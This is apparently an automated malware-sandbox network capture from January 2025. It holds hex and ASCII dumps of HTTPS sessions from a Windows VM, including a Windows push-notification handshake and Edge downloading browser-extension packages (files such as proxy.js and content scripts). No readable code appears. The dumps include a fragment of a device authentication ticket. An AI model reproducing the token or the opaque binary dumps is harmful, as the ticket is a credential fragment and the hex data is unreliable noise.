                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 5a 57 e7 38 0b c6 87 93 75 58 2b 02 b3 a6 72 ec b3 77 05 de d7 7a 8d 7f f7 e5 5e 3b 43 c4 d2 ee 86 ae 60 0f 70 44 6b 8e 6f 74 eb 1a a7 01 0a 5b 30 59 30 13 06 07 2a 86 48 ce 3d 02 01 06 08 2a 86 48 ce 3d 03 01 07 03 42 00 04 b4 02 f9 a9 1c ae e1 0c 84 f8 dc 9b 17 72 98 a5 e0 32 d5 db 2b 59 d8 49 c0 ef be e8 6b f9 f8 62 52 b8 6a 35 53 6c 07 8b 38 d4 ff 9a dd bc dd f9 bc 48 22 69 cc 2d 6c a1 01 60 b4 51 e3 7b d1 cf 12 48 30 46 02 21 00 ff 7e db bf ae f8 db 16 ae bd b9 c0 ab e7 30 ad 6c 9c d3 15 70 54 11 94 f8 16 1e df ed ee bc 44 02 21 00 bc 28 b8 ac fb 62 83 35 71 de 28 a6 8a c0 4e 42 1c b7 de 55 d2 7a e8 1a d6 04 82 e7 61 f8 f4 98 82 f1 04 12 0a 10 45 08 3d 1c dd d8 1f 20 9f 26 b2 b4 58 d3 ca 09 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: ZW8uX+rwz^;C`pDkot[0Y0*H=*H=Br2+YIkbRj5Sl8H"i-l`Q{H0F!~0lpTD!(b5q(NBUzaE= &XPK!
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 99 37 6f 9a 3f 2c 29 25 6c 28 8c 91 6b 84 52 53 7a b7 0d aa 62 54 53 77 b5 ef 7a f4 35 32 19 df c7 a8 b1 0a 93 15 df 81 0a 4f e4 1c 06 b8 06 af 60 ca 43 6a f1 c6 24 ca 0c ba 55 8d 8e ec 8d 54 15 4f f7 34 cf 1c 9b 0f 82 53 d6 4f 5b 65 36 99 e8 f9 e9 8f 91 c6 10 2e d3 1c 43 ae 85 53 74 dd 2c 03 5d 55 b2 4c ad 80 74 2d 4e f3 46 bf dd 63 0e 89 ed 34 2f 4a 1f f5 97 58 93 c7 83 ee ca 26 ec d1 11 e3 90 4d f1 3b e5 b3 aa 1c c5 33 c8 aa 72 b4 ac ca f1 c8 fe 01 50 4b 07 08 01 6c fb f5 cb 01 00 00 c3 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 2d 00 73 77 5f 6d 6f 64 75 6c 65 73 2f 55 54 05 00 01 2a ed 50 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 b1 9b b9 a8 46 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03
                                                                                                                                                                                                                                                                                                                            Data Ascii: 7o?,)%l(kRSzbTSwz52O`Cj$UTO4SO[e6.CSt,]ULt-NFc4/JX&M;3rPKlPK!-sw_modules/UT*Pg F
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 53 0e 9f fa 7f 01 50 4b 07 08 9a 14 02 bb e3 02 00 00 fb 05 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 2d 00 6d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 55 54 05 00 01 74 ed 50 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 32 b7 e5 a8 46 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 18 cb 6e dc 36 f0 ee af 30 f6 12 20 b0 a4 ac 63 a4 41 5a 14 68 d3 97 0f ce 21 49 0f 45 11 08 5c 72 24 d1 4b 91 2a 49 79 bd 30 f2 ef 1d 92 d2 5a 54 f6 21 af dd a4 7b 5a cd 8b 9c 27 67 e6 ee 64 d6 36 8c 58 c8 5b 2d 66 6f 4e 67 95 b5 8d 79 93 65 54 70 90 d6 9c a7 a5 52 a5 80 94 aa 3a 33 a0 6f 38 85 2c 70 9c 67 54 df ce ce 4e 4e 4e f1 37 93 a4 06 c7 9f e7 57 1f 7e cf 57 b0 38 6f 58 f1 eb ad 95 ef 10 91 e7 48 e7 c9 8c 55 9a 94 8e f2
                                                                                                                                                                                                                                                                                                                            Data Ascii: SPKPK!-manifest.jsonUTtPg 2Fn60 cAZh!IE\r$K*Iy0ZT!{Z'gd6X[-foNgyeTpR:3o8,pgTNNN7W~W8oXHU
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 4d 25 d8 0d 9c 18 03 d6 84 e6 8a d9 da a9 7d 3a da 4b f6 c3 0a 57 63 8c 50 25 97 11 4b 78 59 2d 76 32 c3 75 e5 9b e7 fb 08 36 8d dd 80 2c da 76 8e 8f dd 0a e3 2a 5e 9b 55 0a bb a9 9d 0b f7 71 59 ef 5d 19 36 fa 44 ec e6 ac b8 db 92 af 87 5b bd 05 36 3e 35 d1 cb 7e d3 7d f2 f9 5f 50 4b 07 08 ca ce 5c 7d 5d 05 00 00 3b 19 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 2d 00 73 63 68 65 6d 61 2e 6a 73 6f 6e 55 54 05 00 01 3a c6 91 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 99 b7 3a b9 d4 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 90 cd 4e c3 30 10 84 ef 79 8a 55 2e 5c 2a 7a e7 56 09 89 f6 80 40 a2 3c 80 93 ac 13 23 d7 6b d9 6b 95 a8 ea bb 63 3b 21 fd 51 10 39 f8 32 3b b3 3b 9f 4f 05 40 c9 bd c5 f2 09 4a
                                                                                                                                                                                                                                                                                                                            Data Ascii: M%}:KWcP%KxY-v2u6,v*^UqY]6D[6>5~}_PK\}];PK!-schema.jsonUT:f :N0yU.\*zV@<#kkc;!Q92;;O@J
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 72 10 6f 86 02 dd 81 23 a1 37 f4 6f 49 c6 97 c8 45 9c 2a a9 74 43 32 83 27 c4 c1 7c f3 9b f3 5e ee 2b 91 8b d9 7c 25 7b 8c 33 35 fb 4e 93 02 35 3e 54 ae bb 3b e9 72 0f 9f b9 a0 05 52 58 bd 36 d9 60 8b f4 48 c9 f0 74 ec 53 eb f0 f3 d6 b1 f6 2a c3 d3 ad 93 35 9d a2 14 88 64 23 85 0f 7b dc ae f5 8e 58 a5 b8 55 c3 ab 9c 39 f4 4d cb e9 7a d1 23 10 4b 04 66 70 f2 23 4c ad 2d c2 d8 3f 0c 9e 53 ff 36 45 0a f1 98 64 6a 82 07 42 c6 6a a1 f1 cd d1 c9 b4 98 53 78 f7 d1 ea e5 53 65 ec e1 84 a7 f0 48 5d 5d 4a 2b f0 9c 91 fd 76 73 11 85 bd b0 f3 b1 5e ca c1 62 46 48 a0 75 ab 63 ca a6 91 8a 44 a7 13 b7 a0 4a 8e 60 12 57 0f 5a 2f 4b 92 55 bb 81 32 df 28 37 ea d8 00 e1 2b 79 47 bf d8 67 7c 5c 1d 9e 96 6a 14 75 4e 3e 41 cd 9f 95 11 b6 19 85 ae 30 29 71 85 33 c2 9d 14 76 3a
                                                                                                                                                                                                                                                                                                                            Data Ascii: ro#7oIE*tC2'|^+|%{35N5>T;rRX6`HtS*5d#{XU9Mz#Kfp#L-?S6EdjBjSxSeH]]J+vs^bFHucDJ`WZ/KU2(7+yGg|\juN>A0)q3v:
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: c2 2e ba 0e ac 37 29 4d 0b 93 49 4a 67 cb 77 c2 53 99 34 ff 55 f8 ae 11 7b 64 6d 05 5d 93 1c 11 90 9b 16 87 18 0f 1e cb 2e fa 58 9a a3 d4 91 e9 37 96 79 bb 80 06 f5 5d 7b da 98 a4 78 98 54 b9 7a d6 27 cb d4 0a 48 d7 e2 b4 68 34 5f 8f 05 24 b6 d3 a2 da 71 3c e9 1d a9 de 52 95 e7 eb d3 15 c1 f8 2d 65 af c1 e0 01 46 93 2a a3 eb 3f a8 86 4f c3 1f 50 4b 07 08 10 88 26 00 03 02 00 00 2b 04 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 2d 00 63 6f 6e 74 65 6e 74 5f 73 63 72 69 70 74 73 2f 55 54 05 00 01 2a ed 50 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 b1 9b b9 a8 46 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 50 4b 07 08 00 00 00 00 02 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: .7)MIJgwS4U{dm].X7y]{xTz'Hh4_$q<R-eF*?OPK&+PK!-content_scripts/UT*Pg FPKPK!
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 4e bf 5a bc df dd 09 59 b3 60 5c 76 3e 05 9e ef d4 99 fa 2f f8 79 1a 51 58 1b 5e ed 3e 24 bb 04 a2 a2 6e 2d 28 62 ed 7f 01 50 4b 07 08 2d 3a f5 48 43 04 00 00 49 09 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 2d 00 73 77 5f 6d 6f 64 75 6c 65 73 2f 70 72 6f 78 79 2e 6a 73 55 54 05 00 01 3a c6 91 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 99 b7 3a b9 d4 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 54 51 6f db 36 10 7e cf af 60 fd 10 50 31 43 db 59 37 14 72 85 c1 4b d2 2d 43 17 17 89 9f 16 07 01 2d 9d 2d a6 12 29 90 a7 26 9a a1 ff be a3 ec 28 4b 3b 04 7d a8 60 40 22 f9 dd dd 77 df 7d f4 e8 e8 47 3d 07 47 6c 76 36 ff ed 9c 9d ce 2f 3f 5c 9c 9d 5f 2e 2e 66 1f 69 f3 ee db e7 20 80 d9 a9 ad 1a a7 37 39 b2
                                                                                                                                                                                                                                                                                                                            Data Ascii: NZY`\v>/yQX^>$n-(bPK-:HCIPK!-sw_modules/proxy.jsUT:f :TQo6~`P1CY7rK-C--)&(K;}`@"w}G=Glv6/?\_..fi 79
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: 0d 6a 05 b1 57 8a b9 1e 8d 87 83 d0 af 38 84 9c a5 6a c9 8d 48 25 8b 52 69 b8 90 10 b3 05 28 10 92 09 ed 32 2e 63 a6 60 89 74 8d 7b cd 02 58 a6 d2 0c 94 59 b3 74 f6 0d 15 ca 8d 02 0f d7 79 96 25 02 94 76 71 bf 98 21 7d ed 31 36 46 41 42 1a 48 12 88 4c ce 93 92 dd 40 b4 90 22 c2 37 54 25 82 0c 77 b7 3a e1 e6 5a 2b ae 2a 1d 94 00 c3 d5 9a 99 f4 6f a8 81 db 5b 45 4a 5a 2d 05 8f 24 ae e9 9a 71 f4 06 27 8e 88 4f 93 3d e5 5a 93 13 fe 54 d9 21 a3 24 8f 85 9c 33 a3 78 0c 4c 43 a4 c0 94 82 53 85 4a 37 71 22 7e f4 3a 7b 27 b4 86 a5 90 95 a3 d1 71 66 21 f4 8e f3 71 9b 02 3c 27 ce a3 1d 1e 5c 06 25 78 42 87 a2 33 8d 12 91 49 d6 0c 37 4e 45 1c 83 64 b9 4c 40 6b 54 51 a0 88 27 25 8c 41 22 6a bb c4 23 49 10 ee 4a a7 ad 0f 67 2a 5d 7e c3 5d a8 eb 3f f6 39 7f 25 96 28 d6
                                                                                                                                                                                                                                                                                                                            Data Ascii: jW8jH%Ri(2.c`t{XYty%vq!}16FABHL@"7T%w:Z+*o[EJZ-$q'O=ZT!$3xLCSJ7q"~:{'qf!q<'\%xB3I7NEdL@kTQ'%A"j#IJg*]~]?9%(
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:11 UTC1390INData Raw: a9 4a 9f d0 1f be f4 84 0e e3 39 42 1d ba 01 ff a3 e1 95 32 96 bb 2a 3d 7e 6b 30 b4 da e7 2e b9 10 55 15 05 21 45 dd e6 d1 76 bc 51 69 3b 71 3a 05 7c 6f 5c fd 40 c5 0b 58 6d 5c 45 8b 8f 5c f1 25 c6 20 cb 80 e6 48 57 97 75 7b 72 90 4a cf cf 27 3b 4e 75 0c 6a f2 54 b6 ae 50 a9 54 d9 56 79 3f c1 0b 14 16 1d b7 b6 29 ed 2d 14 cc 0a bc 4d 11 d8 75 22 dd 49 e1 26 75 71 c0 2c 26 df ed 4e ae 44 90 5e 8e c9 83 c5 fe d8 a3 01 a8 db 4f 3a 02 2d 17 1b 53 3b 6b 34 b8 00 05 4e e5 3b e8 81 4e 8b be e0 2d 2f 82 8e 0a dd 6a 9d 97 1c 63 e4 30 57 29 bd a8 b2 e1 a0 4d f0 fc dc 39 fc 45 46 f7 58 b7 72 28 34 c7 16 ce e0 df c1 bf 5e ff f2 2b bc d9 6b 77 a5 5f 11 2a e8 90 9e f0 e8 72 69 6f 96 88 fb 78 6d f1 ad d6 26 86 2d 84 51 63 60 ba b5 cc 72 75 a3 1a e2 7b e1 d0 10 b6 df 74
                                                                                                                                                                                                                                                                                                                            Data Ascii: J9B2*=~k0.U!EvQi;q:|o\@Xm\E\% HWu{rJ';NujTPTVy?)-Mu"I&uq,&ND^O:-S;k4N;N-/jc0W)M9EFXr(4^+kw_*rioxm&-Qc`ru{t


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            2192.168.2.64974740.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:13 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 66 46 73 44 70 37 6b 2b 70 45 6d 61 75 6c 51 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 35 64 31 30 33 37 62 35 37 32 32 33 62 66 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: fFsDp7k+pEmaulQ/.1Context: f85d1037b57223bf
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:13 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 66 46 73 44 70 37 6b 2b 70 45 6d 61 75 6c 51 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 35 64 31 30 33 37 62 35 37 32 32 33 62 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: fFsDp7k+pEmaulQ/.2Context: f85d1037b57223bf<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:13 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 66 46 73 44 70 37 6b 2b 70 45 6d 61 75 6c 51 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 38 35 64 31 30 33 37 62 35 37 32 32 33 62 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: fFsDp7k+pEmaulQ/.3Context: f85d1037b57223bf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6f 4b 42 4c 2b 57 36 70 2b 6b 75 56 6e 38 4c 67 63 52 64 31 50 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: oKBL+W6p+kuVn8LgcRd1PQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            3192.168.2.649811142.250.185.2254437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            X-GUploader-UploadID: AFiumC4E3I2kdZqohL83nbJieWzIEj20sI6weMzR1-bygi2mdWswYx6gwn0PUdXtQwaS5IyS
                                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                            Content-Length: 154477
                                                                                                                                                                                                                                                                                                                            X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                                                                                                                                                                            Date: Sat, 04 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                                                            Expires: Sun, 04 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                            Age: 56468
                                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                                            ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                                            Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                                                            Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                                                            Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                                                            Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
